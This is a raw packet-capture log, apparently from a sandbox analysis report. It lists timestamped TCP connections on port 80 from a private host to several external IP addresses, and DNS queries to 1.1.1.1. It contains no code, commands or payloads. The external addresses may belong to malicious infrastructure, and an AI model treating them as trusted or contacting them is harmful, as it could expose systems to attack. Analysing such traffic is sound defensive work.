                                                                    Jan 10, 2025 09:12:33.741627932 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.741652012 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.741661072 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.741683960 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.741693974 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.741728067 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.741753101 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.741826057 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.741863012 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.741873026 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.741897106 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.741931915 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.741945028 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.742005110 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.742041111 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.742050886 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.742074013 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.742114067 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.742119074 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.742180109 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.742218018 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.742228031 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.742489100 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.742532969 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.742871046 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.790750027 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.941695929 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.941711903 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.941724062 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.941735983 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.941747904 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.941936016 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.941939116 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.941951990 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.941965103 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.941977024 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.941987991 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.942027092 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.942146063 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.942421913 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.942434072 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.942445993 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.942560911 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.942572117 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.942583084 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.942661047 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.942735910 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.942919970 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.942930937 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.942943096 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.943056107 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.943068027 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.943078995 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.943092108 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.943123102 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.943149090 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.943242073 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.943253994 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.943265915 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.943294048 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.943342924 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.943896055 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.943909883 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.943922997 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.943993092 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.944087029 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.944098949 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.944111109 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.944123030 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.944261074 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.944272041 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.944284916 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.944294930 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.944371939 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.944907904 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.944920063 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.944931030 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.945005894 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.945096970 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.945108891 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.945121050 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.945132971 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.945146084 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.945173025 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.945255041 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.945272923 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.945286036 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.945743084 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.945827961 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:33.945873976 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.947293043 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.947304964 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.947390079 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:34.147356033 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:34.147372961 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:34.147386074 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:34.147444963 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:34.147464037 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:34.147470951 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:34.147475958 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:34.147488117 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:34.147562981 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:34.147573948 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:34.147587061 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:34.147593021 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:34.147593021 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:34.147609949 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:34.147631884 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:34.147639990 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:34.147679090 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:34.147691965 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:34.148148060 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:34.154194117 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:34.158988953 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:39.654465914 CET5000580192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:39.659281015 CET8050005104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:12:39.659373045 CET5000580192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:39.680250883 CET5000580192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:39.685087919 CET8050005104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:12:40.582638025 CET8050005104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:12:40.583368063 CET8050005104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:12:40.589250088 CET5000580192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:41.181451082 CET5000580192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:42.199807882 CET5000680192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:42.204679012 CET8050006104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:12:42.204783916 CET5000680192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:42.217037916 CET5000680192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:42.221860886 CET8050006104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:12:43.098784924 CET8050006104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:12:43.099179029 CET8050006104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:12:43.099256992 CET5000680192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:43.728208065 CET5000680192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:44.751198053 CET5000780192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:44.756259918 CET8050007104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:12:44.756421089 CET5000780192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:44.778053045 CET5000780192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:44.783246994 CET8050007104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:12:44.783292055 CET8050007104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:12:45.679068089 CET8050007104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:12:45.679359913 CET8050007104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:12:45.679533958 CET5000780192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:46.293103933 CET5000780192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:47.309290886 CET5000880192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:47.314163923 CET8050008104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:12:47.314250946 CET5000880192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:47.325608015 CET5000880192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:47.330414057 CET8050008104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:12:48.218502998 CET8050008104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:12:48.218521118 CET8050008104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:12:48.218715906 CET5000880192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:48.219512939 CET8050008104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:12:48.219626904 CET5000880192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:48.221755981 CET5000880192.168.2.6104.21.64.1
                                                                    Jan 10, 2025 09:12:48.226542950 CET8050008104.21.64.1192.168.2.6
                                                                    Jan 10, 2025 09:13:09.824476957 CET5001180192.168.2.676.223.67.189
                                                                    Jan 10, 2025 09:13:09.829370022 CET805001176.223.67.189192.168.2.6
                                                                    Jan 10, 2025 09:13:09.829694986 CET5001180192.168.2.676.223.67.189
                                                                    Jan 10, 2025 09:13:09.844005108 CET5001180192.168.2.676.223.67.189
                                                                    Jan 10, 2025 09:13:09.848898888 CET805001176.223.67.189192.168.2.6
                                                                    Jan 10, 2025 09:13:10.284492016 CET805001176.223.67.189192.168.2.6
                                                                    Jan 10, 2025 09:13:10.284554005 CET805001176.223.67.189192.168.2.6
                                                                    Jan 10, 2025 09:13:10.285310984 CET5001180192.168.2.676.223.67.189
                                                                    Jan 10, 2025 09:13:11.353180885 CET5001180192.168.2.676.223.67.189
                                                                    Jan 10, 2025 09:13:12.371845007 CET5001280192.168.2.676.223.67.189
                                                                    Jan 10, 2025 09:13:12.378168106 CET805001276.223.67.189192.168.2.6
                                                                    Jan 10, 2025 09:13:12.378277063 CET5001280192.168.2.676.223.67.189
                                                                    Jan 10, 2025 09:13:12.390806913 CET5001280192.168.2.676.223.67.189
                                                                    Jan 10, 2025 09:13:12.396039009 CET805001276.223.67.189192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 09:13:12.831665993 CET | 80 | 50012 | 76.223.67.189 | 192.168.2.6
Jan 10, 2025 09:13:12.831687927 CET | 80 | 50012 | 76.223.67.189 | 192.168.2.6
Jan 10, 2025 09:13:12.831793070 CET | 50012 | 80 | 192.168.2.6 | 76.223.67.189
Jan 10, 2025 09:13:13.900024891 CET | 50012 | 80 | 192.168.2.6 | 76.223.67.189
Jan 10, 2025 09:13:14.920177937 CET | 50013 | 80 | 192.168.2.6 | 76.223.67.189
Jan 10, 2025 09:13:14.925153017 CET | 80 | 50013 | 76.223.67.189 | 192.168.2.6
Jan 10, 2025 09:13:14.925218105 CET | 50013 | 80 | 192.168.2.6 | 76.223.67.189
Jan 10, 2025 09:13:14.945652962 CET | 50013 | 80 | 192.168.2.6 | 76.223.67.189
Jan 10, 2025 09:13:14.951356888 CET | 80 | 50013 | 76.223.67.189 | 192.168.2.6
Jan 10, 2025 09:13:14.951462984 CET | 80 | 50013 | 76.223.67.189 | 192.168.2.6
Jan 10, 2025 09:13:15.395951986 CET | 80 | 50013 | 76.223.67.189 | 192.168.2.6
Jan 10, 2025 09:13:15.395976067 CET | 80 | 50013 | 76.223.67.189 | 192.168.2.6
Jan 10, 2025 09:13:15.396028042 CET | 50013 | 80 | 192.168.2.6 | 76.223.67.189
Jan 10, 2025 09:13:16.462799072 CET | 50013 | 80 | 192.168.2.6 | 76.223.67.189
Jan 10, 2025 09:13:17.615411043 CET | 50014 | 80 | 192.168.2.6 | 76.223.67.189
Jan 10, 2025 09:13:17.620424032 CET | 80 | 50014 | 76.223.67.189 | 192.168.2.6
Jan 10, 2025 09:13:17.620507956 CET | 50014 | 80 | 192.168.2.6 | 76.223.67.189
Jan 10, 2025 09:13:17.642287016 CET | 50014 | 80 | 192.168.2.6 | 76.223.67.189
Jan 10, 2025 09:13:17.647281885 CET | 80 | 50014 | 76.223.67.189 | 192.168.2.6
Jan 10, 2025 09:13:18.081914902 CET | 80 | 50014 | 76.223.67.189 | 192.168.2.6
Jan 10, 2025 09:13:18.081996918 CET | 80 | 50014 | 76.223.67.189 | 192.168.2.6
Jan 10, 2025 09:13:18.082263947 CET | 50014 | 80 | 192.168.2.6 | 76.223.67.189
Jan 10, 2025 09:13:18.084455013 CET | 50014 | 80 | 192.168.2.6 | 76.223.67.189
Jan 10, 2025 09:13:18.089339018 CET | 80 | 50014 | 76.223.67.189 | 192.168.2.6
Jan 10, 2025 09:13:24.026299000 CET | 50015 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:24.031354904 CET | 80 | 50015 | 103.247.11.204 | 192.168.2.6
Jan 10, 2025 09:13:24.032789946 CET | 50015 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:24.045180082 CET | 50015 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:24.050267935 CET | 80 | 50015 | 103.247.11.204 | 192.168.2.6
Jan 10, 2025 09:13:24.945547104 CET | 80 | 50015 | 103.247.11.204 | 192.168.2.6
Jan 10, 2025 09:13:24.945914984 CET | 80 | 50015 | 103.247.11.204 | 192.168.2.6
Jan 10, 2025 09:13:24.945982933 CET | 50015 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:25.556214094 CET | 50015 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:26.574014902 CET | 50016 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:26.579210043 CET | 80 | 50016 | 103.247.11.204 | 192.168.2.6
Jan 10, 2025 09:13:26.579358101 CET | 50016 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:26.592706919 CET | 50016 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:26.597569942 CET | 80 | 50016 | 103.247.11.204 | 192.168.2.6
Jan 10, 2025 09:13:27.495505095 CET | 80 | 50016 | 103.247.11.204 | 192.168.2.6
Jan 10, 2025 09:13:27.495795012 CET | 80 | 50016 | 103.247.11.204 | 192.168.2.6
Jan 10, 2025 09:13:27.495857000 CET | 50016 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:28.104816914 CET | 50016 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:29.264400959 CET | 50017 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:29.269438028 CET | 80 | 50017 | 103.247.11.204 | 192.168.2.6
Jan 10, 2025 09:13:29.269512892 CET | 50017 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:29.329629898 CET | 50017 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:29.334580898 CET | 80 | 50017 | 103.247.11.204 | 192.168.2.6
Jan 10, 2025 09:13:29.334676027 CET | 80 | 50017 | 103.247.11.204 | 192.168.2.6
Jan 10, 2025 09:13:30.413875103 CET | 80 | 50017 | 103.247.11.204 | 192.168.2.6
Jan 10, 2025 09:13:30.414875031 CET | 80 | 50017 | 103.247.11.204 | 192.168.2.6
Jan 10, 2025 09:13:30.418690920 CET | 50017 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:30.837295055 CET | 50017 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:31.954742908 CET | 50018 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:31.959857941 CET | 80 | 50018 | 103.247.11.204 | 192.168.2.6
Jan 10, 2025 09:13:31.962750912 CET | 50018 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:31.974636078 CET | 50018 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:31.979535103 CET | 80 | 50018 | 103.247.11.204 | 192.168.2.6
Jan 10, 2025 09:13:32.875283957 CET | 80 | 50018 | 103.247.11.204 | 192.168.2.6
Jan 10, 2025 09:13:32.875363111 CET | 80 | 50018 | 103.247.11.204 | 192.168.2.6
Jan 10, 2025 09:13:32.878782034 CET | 50018 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:32.882230043 CET | 50018 | 80 | 192.168.2.6 | 103.247.11.204
Jan 10, 2025 09:13:32.887088060 CET | 80 | 50018 | 103.247.11.204 | 192.168.2.6
Jan 10, 2025 09:13:38.162666082 CET | 50019 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:38.167977095 CET | 80 | 50019 | 136.243.64.147 | 192.168.2.6
Jan 10, 2025 09:13:38.174654007 CET | 50019 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:38.306579113 CET | 50019 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:38.311670065 CET | 80 | 50019 | 136.243.64.147 | 192.168.2.6
Jan 10, 2025 09:13:38.849394083 CET | 80 | 50019 | 136.243.64.147 | 192.168.2.6
Jan 10, 2025 09:13:38.849560976 CET | 80 | 50019 | 136.243.64.147 | 192.168.2.6
Jan 10, 2025 09:13:38.849751949 CET | 50019 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:39.805886030 CET | 50019 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:40.831378937 CET | 50020 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:40.836652994 CET | 80 | 50020 | 136.243.64.147 | 192.168.2.6
Jan 10, 2025 09:13:40.841553926 CET | 50020 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:40.856575966 CET | 50020 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:40.861479044 CET | 80 | 50020 | 136.243.64.147 | 192.168.2.6
Jan 10, 2025 09:13:41.488694906 CET | 80 | 50020 | 136.243.64.147 | 192.168.2.6
Jan 10, 2025 09:13:41.488728046 CET | 80 | 50020 | 136.243.64.147 | 192.168.2.6
Jan 10, 2025 09:13:41.488787889 CET | 50020 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:42.368417978 CET | 50020 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:43.389312029 CET | 50021 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:43.394809961 CET | 80 | 50021 | 136.243.64.147 | 192.168.2.6
Jan 10, 2025 09:13:43.394890070 CET | 50021 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:43.439448118 CET | 50021 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:43.444816113 CET | 80 | 50021 | 136.243.64.147 | 192.168.2.6
Jan 10, 2025 09:13:43.444859028 CET | 80 | 50021 | 136.243.64.147 | 192.168.2.6
Jan 10, 2025 09:13:44.061045885 CET | 80 | 50021 | 136.243.64.147 | 192.168.2.6
Jan 10, 2025 09:13:44.061142921 CET | 80 | 50021 | 136.243.64.147 | 192.168.2.6
Jan 10, 2025 09:13:44.064502954 CET | 50021 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:44.950526953 CET | 50021 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:45.964749098 CET | 50022 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:45.970215082 CET | 80 | 50022 | 136.243.64.147 | 192.168.2.6
Jan 10, 2025 09:13:45.973340988 CET | 50022 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:45.980811119 CET | 50022 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:45.985726118 CET | 80 | 50022 | 136.243.64.147 | 192.168.2.6
Jan 10, 2025 09:13:46.615577936 CET | 80 | 50022 | 136.243.64.147 | 192.168.2.6
Jan 10, 2025 09:13:46.615642071 CET | 80 | 50022 | 136.243.64.147 | 192.168.2.6
Jan 10, 2025 09:13:46.617733002 CET | 50022 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:46.645618916 CET | 50022 | 80 | 192.168.2.6 | 136.243.64.147
Jan 10, 2025 09:13:46.650911093 CET | 80 | 50022 | 136.243.64.147 | 192.168.2.6
Jan 10, 2025 09:13:59.909902096 CET | 50023 | 80 | 192.168.2.6 | 172.67.148.216
Jan 10, 2025 09:13:59.914968014 CET | 80 | 50023 | 172.67.148.216 | 192.168.2.6
Jan 10, 2025 09:13:59.915041924 CET | 50023 | 80 | 192.168.2.6 | 172.67.148.216
Jan 10, 2025 09:13:59.928872108 CET | 50023 | 80 | 192.168.2.6 | 172.67.148.216
Jan 10, 2025 09:13:59.934134960 CET | 80 | 50023 | 172.67.148.216 | 192.168.2.6
Jan 10, 2025 09:14:01.430655956 CET | 50023 | 80 | 192.168.2.6 | 172.67.148.216
Jan 10, 2025 09:14:01.436306000 CET | 80 | 50023 | 172.67.148.216 | 192.168.2.6
Jan 10, 2025 09:14:01.436381102 CET | 50023 | 80 | 192.168.2.6 | 172.67.148.216
Jan 10, 2025 09:14:02.452678919 CET | 50024 | 80 | 192.168.2.6 | 172.67.148.216
Jan 10, 2025 09:14:02.458029032 CET | 80 | 50024 | 172.67.148.216 | 192.168.2.6
Jan 10, 2025 09:14:02.459100962 CET | 50024 | 80 | 192.168.2.6 | 172.67.148.216
Jan 10, 2025 09:14:02.470993042 CET | 50024 | 80 | 192.168.2.6 | 172.67.148.216
Jan 10, 2025 09:14:02.475876093 CET | 80 | 50024 | 172.67.148.216 | 192.168.2.6
Jan 10, 2025 09:14:04.048533916 CET | 50024 | 80 | 192.168.2.6 | 172.67.148.216
Jan 10, 2025 09:14:04.054079056 CET | 80 | 50024 | 172.67.148.216 | 192.168.2.6
Jan 10, 2025 09:14:04.054260015 CET | 50024 | 80 | 192.168.2.6 | 172.67.148.216
Jan 10, 2025 09:14:05.058058977 CET | 50025 | 80 | 192.168.2.6 | 172.67.148.216
Jan 10, 2025 09:14:05.063405037 CET | 80 | 50025 | 172.67.148.216 | 192.168.2.6
Jan 10, 2025 09:14:05.066529036 CET | 50025 | 80 | 192.168.2.6 | 172.67.148.216
Jan 10, 2025 09:14:05.078572989 CET | 50025 | 80 | 192.168.2.6 | 172.67.148.216
Jan 10, 2025 09:14:05.083456039 CET | 80 | 50025 | 172.67.148.216 | 192.168.2.6
Jan 10, 2025 09:14:05.083667994 CET | 80 | 50025 | 172.67.148.216 | 192.168.2.6
Jan 10, 2025 09:14:06.587028980 CET | 50025 | 80 | 192.168.2.6 | 172.67.148.216
Jan 10, 2025 09:14:06.593879938 CET | 80 | 50025 | 172.67.148.216 | 192.168.2.6
Jan 10, 2025 09:14:06.594082117 CET | 50025 | 80 | 192.168.2.6 | 172.67.148.216
Jan 10, 2025 09:14:08.698760986 CET | 50026 | 80 | 192.168.2.6 | 172.67.148.216
Jan 10, 2025 09:14:08.703902006 CET | 80 | 50026 | 172.67.148.216 | 192.168.2.6
Jan 10, 2025 09:14:08.704015017 CET | 50026 | 80 | 192.168.2.6 | 172.67.148.216
Jan 10, 2025 09:14:08.711512089 CET | 50026 | 80 | 192.168.2.6 | 172.67.148.216
Jan 10, 2025 09:14:08.716398954 CET | 80 | 50026 | 172.67.148.216 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 09:10:55.796648026 CET | 56955 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 09:10:56.151990891 CET | 53 | 56955 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 09:11:12.060868025 CET | 51971 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 09:11:12.082726955 CET | 53 | 51971 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 09:11:25.348342896 CET | 56978 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 09:11:25.362319946 CET | 53 | 56978 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 09:11:39.325790882 CET | 53798 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 09:11:39.342988014 CET | 53 | 53798 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 09:11:53.637645960 CET | 61203 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 09:11:53.647073030 CET | 53 | 61203 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 09:12:01.701426029 CET | 58145 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 09:12:01.710093975 CET | 53 | 58145 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 09:12:10.298854113 CET | 49412 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 09:12:10.352669954 CET | 53 | 49412 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 09:12:24.501889944 CET | 61513 | 53 | 192.168.2.6 | 1.1.1.1
